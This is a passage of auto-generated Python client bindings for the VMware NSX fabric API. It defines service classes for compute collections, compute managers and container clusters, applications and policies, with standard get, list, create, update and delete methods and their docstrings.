:type compute_collection_fabric_template: :class:`com.vmware.nsx.model_client.ComputeCollectionFabricTemplate`
:param compute_collection_fabric_template: (required)
:rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionFabricTemplate`
:return: com.vmware.nsx.model.ComputeCollectionFabricTemplate
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'compute_collection_fabric_template': compute_collection_fabric_template,
})
def delete(self,
fabric_template_id,
):
"""
Deletes compute collection fabric template for the given id
:type fabric_template_id: :class:`str`
:param fabric_template_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'fabric_template_id': fabric_template_id,
})
def get(self,
fabric_template_id,
):
"""
Get compute collection fabric template for the given id
:type fabric_template_id: :class:`str`
:param fabric_template_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionFabricTemplate`
:return: com.vmware.nsx.model.ComputeCollectionFabricTemplate
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'fabric_template_id': fabric_template_id,
})
def list(self,
compute_collection_id=None,
):
"""
Returns compute collection fabric templates
:type compute_collection_id: :class:`str` or ``None``
:param compute_collection_id: Compute collection id (optional)
:rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionFabricTemplateListResult`
:return: com.vmware.nsx.model.ComputeCollectionFabricTemplateListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'compute_collection_id': compute_collection_id,
})
def update(self,
fabric_template_id,
compute_collection_fabric_template,
):
"""
Updates compute collection fabric template for the given id
:type fabric_template_id: :class:`str`
:param fabric_template_id: (required)
:type compute_collection_fabric_template: :class:`com.vmware.nsx.model_client.ComputeCollectionFabricTemplate`
:param compute_collection_fabric_template: (required)
:rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionFabricTemplate`
:return: com.vmware.nsx.model.ComputeCollectionFabricTemplate
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'fabric_template_id': fabric_template_id,
'compute_collection_fabric_template': compute_collection_fabric_template,
})
class ComputeCollections(VapiInterface):
"""
"""
CREATE_ACTION_NSX = "remove_nsx"
"""
Possible value for ``action`` of method :func:`ComputeCollections.create`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.compute_collections'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ComputeCollectionsStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
cc_ext_id,
action=None,
):
"""
Perform action specific to NSX on the compute-collection. cc-ext-id
should be of type VC_Cluster.
:type cc_ext_id: :class:`str`
:param cc_ext_id: (required)
:type action: :class:`str` or ``None``
:param action: Supported actions on compute-collection (optional)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'cc_ext_id': cc_ext_id,
'action': action,
})
def get(self,
cc_ext_id,
):
"""
Returns information about a specific compute collection.
:type cc_ext_id: :class:`str`
:param cc_ext_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ComputeCollection`
:return: com.vmware.nsx.model.ComputeCollection
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'cc_ext_id': cc_ext_id,
})
def list(self,
cm_local_id=None,
cursor=None,
discovered_node_id=None,
display_name=None,
external_id=None,
included_fields=None,
node_id=None,
origin_id=None,
origin_type=None,
owner_id=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all compute collections.
:type cm_local_id: :class:`str` or ``None``
:param cm_local_id: Local Id of the compute collection in the Compute Manager
(optional)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type discovered_node_id: :class:`str` or ``None``
:param discovered_node_id: Id of the discovered node which belongs to this Compute Collection
(optional)
:type display_name: :class:`str` or ``None``
:param display_name: Name of the ComputeCollection in source compute manager (optional)
:type external_id: :class:`str` or ``None``
:param external_id: External ID of the ComputeCollection in the source Compute manager,
e.g. mo-ref in VC (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type node_id: :class:`str` or ``None``
:param node_id: Id of the fabric node created from a discovered node belonging to
this Compute Collection (optional)
:type origin_id: :class:`str` or ``None``
:param origin_id: Id of the compute manager from where this Compute Collection was
discovered (optional)
:type origin_type: :class:`str` or ``None``
:param origin_type: ComputeCollection type like VC_Cluster. Here the Compute Manager
type prefix would help in differentiating similar named Compute
Collection types from different Compute Managers (optional)
:type owner_id: :class:`str` or ``None``
:param owner_id: Id of the owner of compute collection in the Compute Manager
(optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ComputeCollectionListResult`
:return: com.vmware.nsx.model.ComputeCollectionListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cm_local_id': cm_local_id,
'cursor': cursor,
'discovered_node_id': discovered_node_id,
'display_name': display_name,
'external_id': external_id,
'included_fields': included_fields,
'node_id': node_id,
'origin_id': origin_id,
'origin_type': origin_type,
'owner_id': owner_id,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class ComputeManagers(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.compute_managers'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ComputeManagersStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
compute_manager,
):
"""
Registers compute manager with NSX. Inventory service will collect data
from the registered compute manager
:type compute_manager: :class:`com.vmware.nsx.model_client.ComputeManager`
:param compute_manager: (required)
:rtype: :class:`com.vmware.nsx.model_client.ComputeManager`
:return: com.vmware.nsx.model.ComputeManager
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'compute_manager': compute_manager,
})
def delete(self,
compute_manager_id,
):
"""
Unregisters a specified compute manager
:type compute_manager_id: :class:`str`
:param compute_manager_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'compute_manager_id': compute_manager_id,
})
def get(self,
compute_manager_id,
):
"""
Returns information about a specific compute manager
:type compute_manager_id: :class:`str`
:param compute_manager_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ComputeManager`
:return: com.vmware.nsx.model.ComputeManager
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'compute_manager_id': compute_manager_id,
})
def list(self,
cursor=None,
included_fields=None,
origin_type=None,
page_size=None,
server=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all compute managers.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type origin_type: :class:`str` or ``None``
:param origin_type: Compute manager type like vCenter (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type server: :class:`str` or ``None``
:param server: IP address or hostname of compute manager (optional)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ComputeManagerListResult`
:return: com.vmware.nsx.model.ComputeManagerListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'origin_type': origin_type,
'page_size': page_size,
'server': server,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
compute_manager_id,
compute_manager,
):
"""
Updates a specified compute manager
:type compute_manager_id: :class:`str`
:param compute_manager_id: (required)
:type compute_manager: :class:`com.vmware.nsx.model_client.ComputeManager`
:param compute_manager: (required)
:rtype: :class:`com.vmware.nsx.model_client.ComputeManager`
:return: com.vmware.nsx.model.ComputeManager
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'compute_manager_id': compute_manager_id,
'compute_manager': compute_manager,
})
class ContainerApplicationInstances(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.container_application_instances'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ContainerApplicationInstancesStub)
self._VAPI_OPERATION_IDS = {}
def get(self,
container_application_instance_id,
):
"""
Returns information about a specific container application instance.
:type container_application_instance_id: :class:`str`
:param container_application_instance_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ContainerApplicationInstance`
:return: com.vmware.nsx.model.ContainerApplicationInstance
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'container_application_instance_id': container_application_instance_id,
})
def list(self,
container_application_id=None,
container_cluster_id=None,
container_project_id=None,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all container application instance.
:type container_application_id: :class:`str` or ``None``
:param container_application_id: Identifier of the container application (optional)
:type container_cluster_id: :class:`str` or ``None``
:param container_cluster_id: Identifier of the container cluster (optional)
:type container_project_id: :class:`str` or ``None``
:param container_project_id: Identifier of the container project (optional)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ContainerApplicationInstanceListResult`
:return: com.vmware.nsx.model.ContainerApplicationInstanceListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'container_application_id': container_application_id,
'container_cluster_id': container_cluster_id,
'container_project_id': container_project_id,
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class ContainerApplications(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.container_applications'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ContainerApplicationsStub)
self._VAPI_OPERATION_IDS = {}
def get(self,
container_application_id,
):
"""
Returns information about a specific Container Application within a
project.
:type container_application_id: :class:`str`
:param container_application_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ContainerApplication`
:return: com.vmware.nsx.model.ContainerApplication
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'container_application_id': container_application_id,
})
def list(self,
container_cluster_id=None,
container_project_id=None,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all Container Applications.
:type container_cluster_id: :class:`str` or ``None``
:param container_cluster_id: Identifier of the container cluster (optional)
:type container_project_id: :class:`str` or ``None``
:param container_project_id: Identifier of the container project (optional)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ContainerApplicationListResult`
:return: com.vmware.nsx.model.ContainerApplicationListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'container_cluster_id': container_cluster_id,
'container_project_id': container_project_id,
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class ContainerClusterNodes(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.container_cluster_nodes'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ContainerClusterNodesStub)
self._VAPI_OPERATION_IDS = {}
def get(self,
container_cluster_node_id,
):
"""
Returns information about a specific container cluster node.
:type container_cluster_node_id: :class:`str`
:param container_cluster_node_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ContainerClusterNode`
:return: com.vmware.nsx.model.ContainerClusterNode
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'container_cluster_node_id': container_cluster_node_id,
})
def list(self,
container_cluster_id=None,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all container cluster nodes.
:type container_cluster_id: :class:`str` or ``None``
:param container_cluster_id: Identifier of the container cluster (optional)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ContainerClusterNodeListResult`
:return: com.vmware.nsx.model.ContainerClusterNodeListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'container_cluster_id': container_cluster_id,
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class ContainerClusters(VapiInterface):
"""
"""
LIST_CLUSTER_TYPE_PAS = "PAS"
"""
Possible value for ``clusterType`` of method :func:`ContainerClusters.list`.
"""
LIST_CLUSTER_TYPE_PKS = "PKS"
"""
Possible value for ``clusterType`` of method :func:`ContainerClusters.list`.
"""
LIST_CLUSTER_TYPE_KUBERNETES = "Kubernetes"
"""
Possible value for ``clusterType`` of method :func:`ContainerClusters.list`.
"""
LIST_CLUSTER_TYPE_OPENSHIFT = "Openshift"
"""
Possible value for ``clusterType`` of method :func:`ContainerClusters.list`.
"""
LIST_CLUSTER_TYPE_WCP = "WCP"
"""
Possible value for ``clusterType`` of method :func:`ContainerClusters.list`.
"""
LIST_CLUSTER_TYPE_OTHER = "Other"
"""
Possible value for ``clusterType`` of method :func:`ContainerClusters.list`.
"""
LIST_INFRA_TYPE_VSPHERE = "vSphere"
"""
Possible value for ``infraType`` of method :func:`ContainerClusters.list`.
"""
LIST_INFRA_TYPE_AWS = "AWS"
"""
Possible value for ``infraType`` of method :func:`ContainerClusters.list`.
"""
LIST_INFRA_TYPE_AZURE = "Azure"
"""
Possible value for ``infraType`` of method :func:`ContainerClusters.list`.
"""
LIST_INFRA_TYPE_VMC = "VMC"
"""
Possible value for ``infraType`` of method :func:`ContainerClusters.list`.
"""
LIST_INFRA_TYPE_KVM = "KVM"
"""
Possible value for ``infraType`` of method :func:`ContainerClusters.list`.
"""
LIST_INFRA_TYPE_BAREMETAL = "Baremetal"
"""
Possible value for ``infraType`` of method :func:`ContainerClusters.list`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.container_clusters'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ContainerClustersStub)
self._VAPI_OPERATION_IDS = {}
def get(self,
container_cluster_id,
):
"""
Returns information about a specific container cluster
:type container_cluster_id: :class:`str`
:param container_cluster_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ContainerCluster`
:return: com.vmware.nsx.model.ContainerCluster
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'container_cluster_id': container_cluster_id,
})
def list(self,
cluster_type=None,
cursor=None,
included_fields=None,
infra_type=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all Container Clusters.
:type cluster_type: :class:`str` or ``None``
:param cluster_type: Type of container cluster (optional)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type infra_type: :class:`str` or ``None``
:param infra_type: Type of infrastructure (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ContainerClusterListResult`
:return: com.vmware.nsx.model.ContainerClusterListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cluster_type': cluster_type,
'cursor': cursor,
'included_fields': included_fields,
'infra_type': infra_type,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class ContainerIngressPolicies(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.container_ingress_policies'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ContainerIngressPoliciesStub)
self._VAPI_OPERATION_IDS = {}
def get(self,
ingress_policy_id,
):
"""
Returns information about a specific ingress policy.
:type ingress_policy_id: :class:`str`
:param ingress_policy_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ContainerIngressPolicy`
:return: com.vmware.nsx.model.ContainerIngressPolicy
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'ingress_policy_id': ingress_policy_id,
})
def list(self,
container_cluster_id=None,
container_project_id=None,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all ingress policies.
:type container_cluster_id: :class:`str` or ``None``
:param container_cluster_id: Identifier of the container cluster (optional)
:type container_project_id: :class:`str` or ``None``
:param container_project_id: Identifier of the container project (optional)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ContainerIngressPolicyListResult`
:return: com.vmware.nsx.model.ContainerIngressPolicyListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'container_cluster_id': container_cluster_id,
'container_project_id': container_project_id,
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class ContainerNetworkPolicies(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.fabric.container_network_policies'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ContainerNetworkPoliciesStub)
self._VAPI_OPERATION_IDS = {}
def get(self,
network_policy_id,
):
"""
Returns information about a specific network policy.
:type network_policy_id: :class:`str`
:param network_policy_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ContainerNetworkPolicy`
:return: com.vmware.nsx.model.ContainerNetworkPolicy
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'network_policy_id': network_policy_id,
})
def list(self,
container_cluster_id=None,
container_project_id=None,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns information about all network policies.
:type container_cluster_id: :class:`str` or ``None``
:param container_cluster_id: Identifier of the container cluster (optional)
:type container_project_id: :class:`str` or ``None``
:param container_project_id: Identifier of the container project (optional)
:type cursor: :class:`str` or ``None``
